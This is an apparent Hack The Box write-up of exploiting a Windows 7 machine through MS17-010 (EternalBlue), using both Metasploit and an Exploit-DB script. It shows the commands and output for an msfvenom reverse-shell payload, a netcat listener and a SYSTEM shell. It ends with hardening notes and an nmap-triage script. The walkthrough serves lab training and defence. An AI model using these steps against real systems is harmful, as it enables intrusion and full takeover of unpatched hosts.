
Getting back on HTB. Last time, I had to shift focus after 1 or 2 boxes and did not even have a writeup for them. Let’s see how long I’ll last this time round :). I’m basically starting from scratch now so let’s just say this is my very first box in my list of X boxes to come. It’s a Windows machine rated easy. It’s running a vulnerable SMB version and hence we are able to gain both user and system access.
Table of Contents
- Reconnaissance
- Enumeration
- Exploitation using Metasploit
- Exploitation without Metasploit
- Post Exploitation
- Defender’s Note
Reconnaissance
Let’s start by checking which open ports are available on the machine.
$ nmap -A -T4 -p- 10.10.10.40
The output that we get:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -12m42s, deviation: 34m36s, median: 7m15s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-06-23T08:05:35+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-23T07:05:33
|_ start_date: 2021-06-23T06:57:15
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.15 seconds
We get a bunch of RPC ports open along with SMB. RPC is common to see alongside SMB, but let’s follow the SMB trail. We see that the machine is running Windows 7 SP1. When I do a quick Google search to see whether there are known vulnerabilities for this version of Windows, the first hit points to EternalBlue. MS17-010 (EternalBlue) is a vulnerability in SMBv1 that allows Remote Code Execution on unpatched Windows machines.

Enumeration
We can also use Nmap scripts to check for existing vulnerabilities on SMB.
$ nmap --script smb-vuln* -sV -v -p 139,445 10.10.10.40
The output that we get shows that the machine is indeed vulnerable to ms17-010.
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Exploitation using Metasploit
We can first try pwning this using Metasploit. Does Metasploit have the MS17-010 exploit module available?
$ msfconsole
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
Indeed it does. We see a scanner (1) and a couple of exploits (2-4).
Let’s first verify that the vulnerability does indeed exist on the machine. For that, we will use the scanner module. Let’s check which options are required to use this module.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
We see that four options are required: RHOSTS, RPORT, NAMED_PIPES and THREADS. Three of them already have a default value, so we only need to set RHOSTS, which is currently empty.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
Let’s also double check the path to the NAMED_PIPES file as that option is required. As we can see, the file does exist and has default content in it.
$ cat /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd
Let’s now run the scanner module.
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output shows that the machine is likely vulnerable to MS17-010. Now that we have verified that, we can use one of the exploit modules against it. As this is a Windows 7 machine, we can try module 2 or 4; module 3 is specific to Windows 8+ machines. Let’s first attempt exploit module 2.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
We see that default values exist for all the required options except RHOSTS. We will also need to change LHOST to the IP of our VPN interface. Let’s double check our IP address for the tunnel.
$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.6 netmask 255.255.254.0 destination 10.10.14.6
inet6 fe80::9440:3242:5d61:5230 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::1004 prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 26 bytes 2802 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 50 bytes 4402 (4.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Let’s set the RHOSTS and LHOST then run the module.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
The output that we get is as below.
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] 10.10.10.40:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.40:49158) at 2021-06-23 09:37:22 +0100
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
From the output, we see that we have “ETERNALBLUE overwrite completed successfully”. Let’s now drop into a shell on the pwned computer.
meterpreter > shell
Process 540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
We see that we are running as “NT AUTHORITY\SYSTEM” on the machine. Now, let’s look for the flags on this machine. We can drop to C:\ and check the Users and Administrator folders.
C:\Windows\system32>cd ..\..
cd ..\..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\
14/07/2009 04:20 <DIR> PerfLogs
24/12/2017 03:23 <DIR> Program Files
14/07/2017 17:58 <DIR> Program Files (x86)
14/07/2017 14:48 <DIR> Share
21/07/2017 07:56 <DIR> Users
15/01/2021 11:42 <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 17,256,079,360 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,256,079,360 bytes free
We see that we have a user called “Haris” and an “Administrator”.
Exploitation without Metasploit
Before we get the flags, let’s try to exploit the box without using Metasploit.
We can search for an exploit from Exploit DB.
$ searchsploit --id ms17-010
We get the output seen below.

We can pick an exploit that works on Windows 7 machines. I’ll go with 42315.
We can copy the exploit to our working folder using the mirror (-m) option.
$ searchsploit -m 42315
Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/42315
Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/XXXX/Downloads/42315.py
When we read the downloaded source file, a couple of things come up. First, we need to download the mysmb.py dependency from the URL given in the script.

$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
HTTP request sent, awaiting response... 200 OK
Length: 16669 (16K) [text/plain]
Saving to: ‘42315.py.1’
42315.py.1 100%[==============================================================================================>] 16.28K --.-KB/s in 0.002s
2021-06-23 11:56:02 (6.76 MB/s) - ‘42315.py.1’ saved [16669/16669]
Let’s rename the file accordingly.
$ mv 42315.py.1 mysmb.py
We also see in the exploit that we need a username and password.

Let’s check to see which logins are allowed on the Windows machine.
$ enum4linux -a 10.10.10.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 23 12:04:37 2021
==========================
| Target Information |
==========================
Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
We see that we do have “administrator” and “guest” allowed. Let’s first try with guest since these are normally weaker targets. We need to edit the script and insert the username. We don’t have a password.

From this section, we also see that we need to create a reverse shell payload, e.g. using the “msfvenom” example given in the script.

$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Let’s now add the location of the payload to the exploit code.

We are now ready. Let’s setup a listener on our machine.
$ nc -nlvp 4444
It’s now time to run the exploit.
$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80045f5920
SESSION: 0xfffff8a002c22de0
FLINK: 0xfffff8a002e6d088
InParam: 0xfffff8a002e6715c
MID: 0x3803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service RZsc.....
Starting service RZsc.....
The NETBIOS connection with the remote host timed out.
Removing service RZsc.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
When we go back to the listener terminal, we see that a session with the host is now set up as SYSTEM.
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Post Exploitation
The user flag is normally located on the desktop of a normal user (C:\Documents and Settings\User\Desktop). In this case, we need to traverse to the desktop of user “haris”. Once in the directory, we see the “user.txt” file, whose contents we can read using the “type” command.
C:\Users\haris>cd Desktop
cd Desktop
C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris\Desktop
24/12/2017 03:23 <DIR> .
24/12/2017 03:23 <DIR> ..
21/07/2017 07:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 17,256,079,360 bytes free
C:\Users\haris\Desktop>type user.txt
type user.txt
4c546XXXXXXXXXXXXXXXXeea9
The root flag is normally located on the desktop of the Administrator (C:\Documents and Settings\Administrator\Desktop). Once in the directory, we see the “root.txt” file, whose contents we can read using the “type” command.
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
21/07/2017 07:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 17,256,079,360 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eXXXXXXXXXXXXXXXXXX4e717
Defender’s Note
- SMBv1 is known to be vulnerable to a bunch of vulnerabilities that are easily exploitable in the wild. You would be better off not using it. Use the latest version (SMBv3) if at all possible.
- Patch systems in a timely manner. The vulnerability we exploited here was patched in 2017. If your systems are still unpatched, you’re simply asking for trouble.
- Older versions of Windows may lack support for newer protocols (e.g. SMBv3). Getting rid of older Windows versions from your environment makes attackers’ lives a little more complicated.
- We were able to get in using a guest user. Harden users or get rid of unnecessary users on host machines.
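As an added example (not part of the original writeup or of nmap), the script below turns the nmap host-script output from the Enumeration section into a findings list and pairs each finding with the fix the notes above call for. The sample output is a constructed, abridged copy of the scans above; script names are nmap’s own, and RequireSecuritySignature is the real LanmanServer registry value that enforces SMB signing.

```python
# Added example: triage nmap --script smb-vuln*,smb-security-mode output
# into defender findings, each paired with the corresponding fix.
import re

# Constructed sample: an abridged copy of the host-script output that the
# nmap scans above returned for the target.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""


def parse_host_scripts(text):
    """Return {script_name: [body lines]}. A script line follows the '|' or
    '|_' prefix with at most one space; deeper indentation is its body."""
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        body = raw[2:] if raw.startswith("|_") else raw[1:]
        indent = len(body) - len(body.lstrip(" "))
        line = body.strip()
        if indent <= 1:  # new script block, possibly with an inline value
            name, _, value = line.partition(":")
            current = name
            scripts[current] = [value.strip()] if value.strip() else []
        elif current is not None:
            scripts[current].append(line)
    return scripts


def triage(text):
    """Return (finding, evidence, fix) tuples for the issues this box showed."""
    scripts = parse_host_scripts(text)
    findings = []
    vuln = scripts.get("smb-vuln-ms17-010", [])
    if any(ln.startswith("State:") and "VULNERABLE" in ln for ln in vuln):
        cves = sorted({c for ln in vuln for c in re.findall(r"CVE-\d{4}-\d+", ln)})
        findings.append(("MS17-010", ", ".join(cves) or "no CVE listed",
                         "Apply the MS17-010 update and disable SMBv1 entirely."))
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append(("SMB signing disabled", line,
                             "Require signing (LanmanServer RequireSecuritySignature=1)."))
        elif line.startswith("account_used: guest"):
            findings.append(("Guest session accepted", line,
                             "Disable the Guest account and block null/guest SMB sessions."))
    return findings
```

Running triage(SAMPLE_NMAP_OUTPUT) flags the three things the box relied on (the MS17-010 hole, unsigned SMB and guest access) while leaving the two negative smb-vuln results alone.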
That’s all for now. Adios!